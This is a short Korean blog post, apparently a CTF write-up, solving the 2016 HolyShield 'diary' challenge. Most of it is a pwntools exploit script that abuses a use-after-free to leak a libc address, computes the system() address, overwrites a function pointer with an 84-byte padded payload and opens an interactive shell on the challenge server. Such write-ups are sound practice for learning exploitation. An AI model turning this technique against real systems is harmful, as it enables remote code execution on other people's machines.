튜기's blogggg

2016 holyshield diary

by St1tch


use after free bug문제이다.

대회 때 못풀어서, 학교 셤 끝나고 다시 풀어보았다.

빨리 review문제도 풀어야겠다.





from pwn import *

local = False
if local :
    s = process('./diary')
    print util.proc.pidof(s)
    pause()
else :
    s = remote('kimtae.xyz', 9989)

def command(token, *args) :
    s.recvuntil(token)
    for i in args :
        i = str(i)
        s.sendline(i)

fast = lambda  token, *args : command(token, *args)

def solver() :
    log.success('login...')
    fast(':', '/bin/sh\x00', '25')
    fast('>', '3')
    fast(':', 'rop payload')

    log.success('plan create...')
    fast('>', '1', '2')
    fast(':', 'stitch', '7', '7', 'stitch')
    fast('>', '2')
    fast(':', 'stitch', '7', '7', 'stitch')

    log.success('plan free...')
    fast('>', '4', '100')

    log.success('addr leak...')
    fast('>', '1')

    s.recvuntil('Plan name : ')
    leak = s.recv(6)+'\x00\x00'

    target = hex(u64(leak) - 3663848)
    addr = p32(int(target[-8:],16))
    score = int(target[2:6], 16) - 100

    log.info('system addr = {0}'.format(target))

    log.success('game 1 go...')
    fast('>', '6', '3', '1', '100')
    s.recvuntil('.\n')
    s.sendline('3')
    s.recvuntil('comment\n')
    s.sendline('fuck!')

    log.success('game 2 go...')
    fast('>', '1', '-'+str(score))
    s.recvuntil('.\n')
    s.sendline('3')
    fast('>', str(score+100), '3')
    s.recvuntil('comment\n')
    s.sendline('a'*84 + addr)

    log.success('get shell !! ')
    fast('>', '3', '1', '1')

    s.interactive()

if __name__ == '__main__' :
    solver()




블로그의 정보

튜기's blogg(st1tch)

St1tch

활동하기